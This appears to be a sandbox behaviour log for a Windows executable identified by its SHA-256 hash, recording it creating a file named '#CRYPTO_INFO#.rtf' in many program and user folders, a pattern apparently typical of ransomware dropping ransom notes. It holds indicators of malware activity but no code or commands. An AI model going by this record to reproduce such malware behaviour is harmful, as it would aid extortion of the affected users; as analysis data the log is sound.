8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\1E092169-02CC-4B99-88F6-EB312344559C\en-us.16\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ta\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tk-TM\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-2168186643-810464528-1121082739-1000\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zh-TW\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ja\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\6UUYVBGF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\.oracle_jre_usage\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lt\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\zu-ZA\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Downloads\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\All Users\Microsoft\User Account Pictures\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\en-GB\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Favorites\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#CRYPTO_INFO#.rtf 